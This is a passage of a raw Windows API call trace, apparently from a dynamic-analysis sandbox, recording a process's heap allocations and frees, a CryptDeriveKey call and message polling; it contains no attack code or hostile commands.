hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0210.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50ba8 [0210.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50ba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.086] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0210.086] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87590, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87550) returned 1 [0210.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0210.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0210.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0210.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0210.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0210.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0210.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0210.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0210.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0210.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0210.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0210.090] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0210.091] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0210.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.091] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0210.091] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0210.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0210.091] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0210.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0210.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0210.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0210.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0210.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0210.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0210.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0210.178] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0210.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0210.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b48 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bd8 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b18 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0210.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0210.180] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c68 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0210.180] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0210.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0210.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0210.181] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0210.181] 